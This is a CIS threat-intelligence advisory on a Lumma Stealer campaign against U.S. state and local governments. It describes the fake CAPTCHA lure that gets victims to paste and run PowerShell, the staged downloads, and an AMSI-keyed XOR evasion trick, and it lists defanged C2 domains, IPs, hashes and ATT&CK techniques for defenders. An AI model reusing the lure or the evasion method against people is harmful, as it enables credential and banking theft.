Active Lumma Stealer Campaign Impacting U.S. SLTTs

By: The Center for Internet Security, Inc. (CIS®) Cyber Threat Intelligence (CTI) team

Published March 20, 2025

Cyber Threat Intelligence thumbnail

The CIS CTI team identified Lumma Stealer malware activity impacting U.S. State, Local, Tribal, and Territorial (SLTT) government organizations. CIS analysts observed multiple detections through CIS Endpoint Security Services (ESS) where SLTT victims are redirected to malicious webpages delivering a fake CAPTCHA verification prompt designed to trick users into running a PowerShell script. CIS ESS detected these fake CAPTCHA verification prompts due to Mshta running malicious JavaScript as well as the attempted PowerShell script. (Mshta is a Windows utility used to execute Microsoft HTML applications (HTA) files.)

Once the PowerShell script runs on the victim’s system, two additional PowerShell scripts are downloaded and run. A third PowerShell script containing a defense evasion technique and encrypted windows binary code is compiled on the infected system into the .NET Lumma Stealer payload.

The CIS CTI team recommends that U.S. SLTT government entities remain aware of Lumma Stealer and other information stealer campaigns since they are widespread, opportunistic, and known to target sensitive data.

Background Information on Lumma Stealer

Lumma Stealer is an infostealer written in C that emerged on dark web forums in 2022. The cyber threat actors “Shamel,” also known as “Lumma,” sell Lumma Stealer as a Malware-as-a-Service (MaaS) subscription with various tiers.[1] Once cyber threat actors (CTAs) purchase Lumma Stealer, the malware enables them to target personally identifiable information (PII) on victims’ systems such as credentials and banking information.

Depending on the tier CTAs purchase, the malware offers multiple defense evasion capabilities, including detecting virtualized environments, detecting user activity on the system, encrypting Lumma Stealer’s executable to deter reverse engineering, bypassing signature detection, and utilizing polygot files.[2] Lumma Stealer additionally employs a variety of techniques such as Living off the Land, specifically DLL sideloading, Mshta, PowerShell, process hollowing, SSH, and WMI.[3]

Two Incidents with Fake CAPTCHA Verifications

The current campaign uses malvertisement as an initial infection vector to deceive users into clicking malicious ads that lead to fake CAPTCHA verifications. CTAs use traffic distribution systems, content delivery networks, and compromised websites to spread malvertisements, which redirect end users to CTA-created webpages hosted on various providers.[4],[5] After the victim clicks the “I’m not a robot” button in the fake CAPTCHA verification (Figure 1), they encounter unusual verification steps, which include:

Press Windows button + R
Press CTRL+V
Press Enter

Figure1_Fake_Captcha_Verification_Steps

^{Figure 1: Fake CAPTCHA verification steps. (Source:}Qualys⁾

These steps execute a PowerShell command that leads to a Lumma Stealer download. The CIS CTI team analyzed two specific incidents associated with this activity based on CIS ESS detections, as described below.[6]

Incident One

In the first incident, the victim’s browser redirected to a fake CAPTCHA verification webpage housing obfuscated JavaScript as well as a Base64-encoded PowerShell script. CIS ESS detected the obfuscated JavaScript in the command line. Figure 2 shows the de-obfuscated script that ran in the command line.

Figure2_De-Obfuscated_script_that_was_run_in_the_command_line ^{Figure 2: De-Obfuscated script that was run in the command line.}

After the victim completed the verification steps, the encoded PowerShell script ran on their machine. Figure 3 shows that the decoded PowerShell script was hidden and attempted to download a file. CIS ESS blocked this activity. If not blocked, the downloaded file would have run an obfuscated and encoded PowerShell script, downloading the final Lumma Stealer payload.

Figure3_Decoded_PowerShell_script_is_hidden_and_attempting_to_download_a_file ^{Figure 3: Decoded PowerShell script is hidden and attempting to download a file.}

Incident Two

Like in the first incident, the victim in second incident was redirected from a compromised or malicious webpage to a fake CAPTCHA verification page. CIS ESS once again detected the obfuscated JavaScript in the command line using Mshta. Figure 3 shows the de-obfuscated script. However, the PowerShell script had additional obfuscation including strings with additional Base64 encoding, as shown in Figure 4.

Figure4_Base64-Encoded_PowerShell_script ^{Figure 4: Base64-Encoded PowerShell script.}

As shown in Figure 5, the decoded PowerShell script included substantial amounts of junk code, but the end of the decoded script contained a PowerShell script that similarly attempted to download a file. Despite looking like a database file, Handler.db was another encoded PowerShell script.

Figure5_Decoded_PowerShell_script ^{Figure 5: Decoded PowerShell script.}

This encoded PowerShell script was heavily obfuscated; however, CIS analysts discovered a PowerShell command in the first half of the script that identified whether the infected system would detect Mimikatz. See Figure 6.

Figure6_Decoded_PowerShell_identifies_whether_the_infected_system_will_detect_Mimikatz

^{Figure 6: Decoded PowerShell identifies whether the infected system will detect Mimikatz.}

CIS analysts identified that the PowerShell script was encoded with Decimal and Base64. After decoding it, they determined it was encrypted with an XOR cipher. CIS analysts then debugged the script and set a breakpoint to isolate the XOR key after it was assigned to a variable, as shown in Figure 7.

Figure7_Debugged_PowerShell_script_with_breakpoint_set_after_the_XOR_Key_assigned_to_a_variable

^{Figure 7: Debugged PowerShell script with breakpoint set after the XOR Key was assigned to a variable.}

CIS analysts used the debugger to read the value of the variable, which revealed the plaintext XOR Key (AMSI_RESULTS_NOT_DETECTED), which they then used to fully decrypt the PowerShell script. Notably, the string in response to the Mimikatz command (Figure 6) is always used as the decryption key. This means that if the result is AMSI_RESULTS_NOT_DETECTED, the rest of the PowerShell script is decrypted. However, if the result is AMSI_RESULTS_DETECTED, the PowerShell script is not decrypted due to the XOR key not being provided. The decrypted PowerShell script contained another PowerShell script with a Base64-encoded string that was Windows binary code for the final .NET Lumma Stealer payload, as shown in Figure 8.

Figure8_Decoded_PowerShell_string_shows_Windows_binary_code_which_when_compiled_is_NET_Lumma

^{Figure 8: Decoded PowerShell string shows Windows binary code, which when compiled is the .NET Lumma Stealer payload.}

Once decoded, the PowerShell script compiles and executes the Lumma Stealer payload.

Indicators of Compromise

Lumma Stealer frequently shifts its C2 infrastructure, so the domains and IP addresses listed below may not represent active infrastructure but can be used for retroactive threat hunting. The following IOCs are sourced from CIS CTI analysis and open-source research.[7]^,[8]^,[9]^,[10]^,[11]

C2 IPs

104[.]21[.]37[.]171
13[.]107[.]246[.]38
172[.]67[.]144[.]66
172[.]67[.]214[.]67
172[.]67[.]74[.]152
45[.]61[.]136[.]138
5[.]161[.]229[.]58
64[.]52[.]80[.]211

Domains

absolutepicks[.]shop
addonclicks[.]com
adlndb2k9too7vt[.]cn
adlndb2k9too7vt[.]com
adlndb2k9too7vt[.]fun
adlndb2k9too7vt[.]top
adlndb2k9too7vt[.]xyz
adstrails[.]com
ajmaboxanherulv1[.]b-cdn[.]net
ajmaboxanherulv2[.]b-cdn[.]net
anti-automation-v2[.]b-cdn[.]net
anti-automation-v3[.]b-cdn[.]net
anti-automation-v4[.]b-cdn[.]net
anti-automation-v5[.]b-cdn[.]net
anti-automation-v6[.]b-cdn[.]net
apporholis[.]shop
arcivevaxue34[.]b-cdn[.]net
asping[.]klipnozenui[.]shop
bassizcellskz[.]shop
bettercart[.]shop
bhf.kliplygah[.]shop
bitc[.]kliplubuziy[.]shop
bmy7etxgksxo[.]objectstorage[.]ca-toronto-1[.]oci[.]customer-oci[.]com
bmy7etxgksxo[.]objectstorage[.]sa-santiago-1[.]oci[.]customer-oci[.]com
boltsreach[.]com
botcheck-encrypted-system[.]b-cdn[.]net
bot-check-v1[.]b-cdn[.]net
bot-check-v2[.]b-cdn[.]net
bot-systemexplorer[.]b-cdn[.]net
camplytic[.]com
cdn-downloads-now[.]xyz
celebratioopz[.]shop
ch3[.]dlvideosfre[.]click
charminammoc[.]cyou
check-cf-ver1[.]b-cdn[.]net
check-in-cf[.]b-cdn[.]net
chicmoments[.]shop
chipdonkeruz[.]shop
chromeupdates[.]com
clickzstreamer[.]com
cloud-checked[.]com
clovixo[.]com
complaintsipzzx[.]shop
crookedfoshe[[.]]bond
crowdwarek[.]shop
data-seed-prebsc-1-s1[.]bnbchain[.]org
dawnbloom[.]shop
dazzletouch[.]shop
deallerospfosu[.]shop
dedicloadpgeing[.]b-cdn[.]net
dedicloadpgeingv10[.]b-cdn[.]net
dedicloadpgeingv11[.]b-cdn[.]net
dedicloadpgeingv12[.]b-cdn[.]net
dedicloadpgeingv2[.]b-cdn[.]net
dedicloadpgeingv4[.]b-cdn[.]net
dedicloadpgeingv5[.]b-cdn[.]net
dedicloadpgeingv6[.]b-cdn[.]net
dedicloadpgeingv7[.]b-cdn[.]net
dedicloadpgeingv8[.]b-cdn[.]net
dedicloadpgeingv9[.]b-cdn[.]net
ebuymore[.]shop
echoicedeals[.]shop
editorcoms[.]com
encryption-code-verification[.]b-cdn[.]net
encryption-module-botverify[.]b-cdn[.]net
femalsabler[.]shop
fiare-activity[.]com
file-typ-botcheck[.]b-cdn[.]net
file-typ-botcheck-v1[.]b-cdn[.]net
findkik[.]com
fineclouding[.]com
fingerboarding[.]com
fixazo[.]online
foodrailway[.]cfd
freeofapps[.]com
full-fast-movie-downloader[.]b-cdn[.]net
futureddospzmvq[.]shop
gabrize[.]shop
gamebalri[.]com
gawanjaneto[.]com
getcodavbiz[.]com
get-verified[.]b-cdn[.]net
get-verified2[.]b-cdn[.]net
glidronix[.]com
godagichi[.]com
greetycruthsuo[.]shop
growthselec[[.]]bond
gustavu[.]shop
handscreamny[.]shop
hardcorelegends[.]com
helpmemoverand[.]com
hhhh[.]klipcewucyu[.]shop
human-check[.]b-cdn[.]net
human-verify02[.]b-cdn[.]net
ialphacore.shop
ibattleboost.shop
immolatechallen[.]bond
impressflow[.]com
insigelo[.]com
iplogger[.]co
itechtics[.]com
izmncdnboxuse01[.]b-cdn[.]net
izmncdnboxuse02[.]b-cdn[.]net
izmncdnboxuse03[.]b-cdn[.]net
izmncdnboxuse04[.]b-cdn[.]net
izmncdnboxuse05[.]b-cdn[.]net
izmncdnboxuse06[.]b-cdn[.]net
izmncdnboxuse07[.]b-cdn[.]net
jarry-deatile[.]bond
jarry-fixxer[.]bond
kev-tolstoi[.]com
kiddoloom[.]shop
klipderiq[.]shop
lalclenfjhkinbn[.]top
languagedscie[.]shop
latestgadet[.]com
linkspans[.]com
longingfluffyr[.]cyou
marimarbahamas[.]me
mediamanagerverif[.]com
mennyudosirso[.]shop
misha-lomonosov[.]com
myapt67[.]s3[.]amazonaws[.]com
mytecbiz[.]org
n[.]kliphirofey[.]shop
n2[.]aroundpayablequirk[.]shop
nettrilo[.]com
newverifyyourself-system[.]b-cdn[.]net
newverifyyourself-system1[.]b-cdn[.]net
nikutjyjgchr[.]b-cdn[.]net
nikutjyjgchrv21[.]b-cdn[.]net
nikutjyjgchrv22[.]b-cdn[.]net
nikutjyjgchrv23[.]b-cdn[.]net
nikutjyjgchrv24[.]b-cdn[.]net
nikutjyjgchrv25[.]b-cdn[.]net
nowuseemi[.]com
objectstorage[.]ap-mumbai-1[.]oraclecloud[.]com
objectstorage[.]sa-santiago-1[.]oraclecloud[.]com
offerzforu[.]com
offerztodayforu[.]com
pain-temper[.]bond
precious-valkyrie-cea580[.]netlify[.]app
privatemeld[.]com
privatox[.]com
provenhandshakecap[.]com
pub-7a0525921ff54f1193db83d7303c6ee8[.]r2[.]dev
purnimaali[.]com
qu[.]ax
quialitsuzoxm[.]shop
reachorax[.]com
regsigara[.]com
restoindia[.]me
robinsharez[.]shop
satisfiedweb[.]com
scrutinycheck[.]cash
searchmegood[.]com
secureporter[.]com
servinglane[.]com
sheenglathora[.]com
smartlinkoffer[.]com
solve[.]bogx[.]org
sos-at-vie-1[.]exo[.]io
sos-at-vie-2[.]exo[.]io
sos-bg-sof-1[.]exo[.]io
sos-ch-dk-2[.]exo[.]io
sos-ch-gva-2[.]exo[.]io
sos-ch-gva-2[.]sos-cdn[.]net
sos-de-fra-1[.]exo[.]io
soundtappysk[.]shop
spotconningo[.]com
sputinik-1985[.]com
startingdestine[.]com
steamcommunity[.]com
streamingsplays[.]com
streamingszone[.]com
stripedre-lot[.]bond
strivehelpeu[.]bond
styletrove[.]shop
system-update-botcheck[.]b-cdn[.]net
sys-update-botcheck[.]b-cdn[.]net
tagsflare[.]com
taketheright[.]com
techstalone[.]com
tibedowqmwo[.]shop
tracksvista[.]com
trailsift[.]com
travelwithandrew[.]xyz
tunneloid[.]com
upgraded-botcheck-encryption[.]b-cdn[.]net
vanshitref[.]com
verif[.]dlvideosfre[.]click
verification-module-v2[.]b-cdn[.]net
verification-module-v3[.]b-cdn[.]net
verification-module-v4[.]b-cdn[.]net
verification-module-v5[.]b-cdn[.]net
verification-module-v6[.]b-cdn[.]net
verification-module-v7[.]b-cdn[.]net
verification-module-v8[.]b-cdn[.]net
verification-module-v9[.]b-cdn[.]net
verifyyourself-newsystem[.]b-cdn[.]net
verifyyourself-system[.]b-cdn[.]net
versersleep[.]shop
verticbuzz[.]com
weoidnet01[.]b-cdn[.]net
weoidnet010[.]b-cdn[.]net
weoidnet011[.]b-cdn[.]net
weoidnet012[.]b-cdn[.]net
weoidnet013[.]b-cdn[.]net
weoidnet015[.]b-cdn[.]net
weoidnet02[.]b-cdn[.]net
weoidnet03[.]b-cdn[.]net
weoidnet04[.]b-cdn[.]net
weoidnet05[.]b-cdn[.]net
weoidnet06[.]b-cdn[.]net
weoidnet07[.]b-cdn[.]net
weoidnet08[.]b-cdn[.]net
weoidnet09[.]b-cdn[.]net
westreamdaily[.]com
writerospzm[.]shop
yourtruelover[.]com
ytgvjh65archi[.]b-cdn[.]net

SHA256 Hashes

C0F74200267A768EB6F8A392A708C9CEDE9062E0E9D4391040AE94B495450D0D
fa3a5323454f98a482f5a8f9c830a80a5126dedea1492e98cdddf6442b1f7ee5
fb62bd6898fd17736800c6e213d3cc2e1d3300fd2f436156e4c2e2761ee5d920
0f5616b1638210fe909c6f6ce54882e2184dc6cfb052dbef6181c1bcd6e7d544
020c9112268594827baa644e08736a80ba2188f9942b03bcbe84de04b4e88e73
2a5558eb96007a1cb012202300b8ba4219f428044b901ab90c196abe9493212c
3cd0bd0ff0f5938d9b98b5a2bed3330e40403079bc8a4f01480ced32a9866134
3203a5ec6a808fb1e0e54a1393b72a75a95ae9b8003fc2d0b8d2d41f45a1a437
380a43c20a6500fed2dbbc3ab7e5b72886f5f73b592eb5d1fdc402fdee494553
4abbd3dae6c4a8708541941b63f46eb5d1ec227c75e2e6ffb763dfad29ad2c6a
4a9833f04feea52c3d0475731ed3e512611dc8948297af320234e4a03dfb74ce
539946911ae4b8ba1df0683de99d1911980acb4321a83caeca945d8e8c9c20d5
6bbfc78bda5d24aac10a2e22fc9f01b149a3dff5df17bd93c7a645224270c724
6d753b02ed2861e677adf5ac7bade2deb85e461e084d957796e96567fb334591
730f07308ac60dd05e67623945793f3413e01006cea97f725ae7618881a76f2d
8d35f815d50d5a82ca2135821a44f2e1211fb78f66a39caf761586864d835bae
81e2bc219563706963183b86c6a22f3dd5448f82fe3a603f261b4282988d5075
819362da725ad20659c58d5caa51e3cdefc6fae693a16f9c5a1f7652eeca7f1e

MITRE ATT&CK Patterns Observed

The MITRE ATT&CK Patterns below are based on CIS analysis as well as open-source reporting on the current Lumma Stealer campaign and capabilities.[12]^,[13]^,[14]^,[15]

Resource Development

T1583.001 Acquire Infrastructure: Domains
T1583.008 Acquire Infrastructure: Malvertising
T1584.006 Compromise Infrastructure: Web Services
T1588.002 Obtain Capabilities: Tool
T1608.001 Stage Capabilities: Upload Malware
T1608.004 Stage Capabilities: Drive-by Target
T1608.005 Stage Capabilities: Link Target

Initial Access

T1189 Drive-by Compromise
T1190 Exploit Public-Facing Application
T1566.002 Phishing: Spearphishing Link
T1566.003 Phishing: Spearphishing via Service

Execution

T1047 Windows Management Instrumentation
T1059.001 Command and Scripting Interpreter: PowerShell
T1059.003 Command and Scripting Interpreter: Windows Command Shell
T1106 Native API
T1204 User Execution

Persistence

T1547.001 Boot or Logon AutoStart Execution: Registry Run Keys/Startup Folder

Privilege Escalation

T1055.012 Process Injection: Process Hollowing
T1547.001 Boot or Logon AutoStart Execution: Registry Run Keys/Startup Folder

Defense Evasion

T1027.009 Obfuscated Files or Information: Embedded Payloads
T1027.010 Obfuscated Files or Information: Command Obfuscation
T1027.013 Obfuscated Files or Information: Encrypted/Encoded File
T1027.001 Obfuscated Files or Information: Binary Padding
T1027.002 Obfuscated Files or Information: Software Packing
T1036.008 Masquerading: Masquerade File Type
T1055 Process Injection
T1055.012 Process Hollowing
T1112 Modify Registry
T1140 Deobfuscate/Decode Files or Information
T1218.005 System Binary Proxy Execution: Mshta
T1218.011 System Binary Proxy Execution: Rundll32
T1564.003 Hide Artifacts: Hidden Window
T1573.002 Hijack Execution Flow: DLL Side-Loading
T1656 Impersonation

Credential Access

T1056.001 Input Capture: Keylogging
T1539 Steal Web Session Cookie
T1552.001 Unsecured Credentials: Credentials in Files
T1555.003 Credential from Password Stores: Credentials from Web Browsers

Discovery

T1057 Process Discovery
T1082 System Information Discovery
T1083 File and Directory Discovery
T1217 Browser Information Discovery
T1497 Virtualization/Sandbox Evasion
T1497.001 Virtualization/Sandbox Evasion: System Checks
T1518 Software Discovery
T1518.001 Software Discovery: Security Software Discovery

Collection

T1005 Data from Local System
T1056 Input Capture: Keylogging
T1113 Screen Capture
T1115 Clipboard Data
T1119 Automated Collection

Command and Control

T1071. Application Layer Protocol
T1071.001 Application Layer Protocol: Web Protocols
T1105 Ingress Tool Transfer
T1132.001 Data Encoding
T1568.002 Dynamic Resolution: Domain Generation Algorithms

Exfiltration

T1041 Exfiltration Over C2 Channel

Recommendations

The Multi-State Information Sharing and Analysis Center^® (MS-ISAC^®) recommends you take the following attempts to improve network defenses against malware like Lumma Stealer.

Mitigate malicious file execution by blocking unauthorized activities at the endpoint (i.e., host, server) using CIS ESS.
Proactively block your DNS traffic from connecting to known harmful web domains using Malicious Domain Blocking and Reporting (MDBR).
Leverage Albert Network Monitoring and Management, a high-performance Network Intrusion Detection System (NIDS) engine which delivers both traditional and advanced network threat security alerts for the identification and reporting of malicious events.
Implement application allowlists, enabling your organization to actively manage (inventory, track, and correct) all software on the network so that only authorized software is allowed to install or execute. (See CIS Critical Security Control 2.)
Perform regular antivirus scans of systems and ensure those applications remain up to date. (See CIS Critical Security Control 10.)
Implement the principle of least privilege. (See CIS Critical Security Control 6.)
Allow only trusted digitally-signed PowerShell scripts to run. (See CIS Critical Security Control 2.)
Ensure adequate logging is in place, particularly for PowerShell such as Transcript, Module, and Script Block logging. (See CIS Critical Security Control 8.)
Provide employee training to protect against social engineering. (See CIS Critical Security Control 14.)
Sign up for the MS-ISAC Indicator Sharing Program. The MS-ISAC encourages SLTTs to reach out to [email protected] for assistance connecting to our sharing services.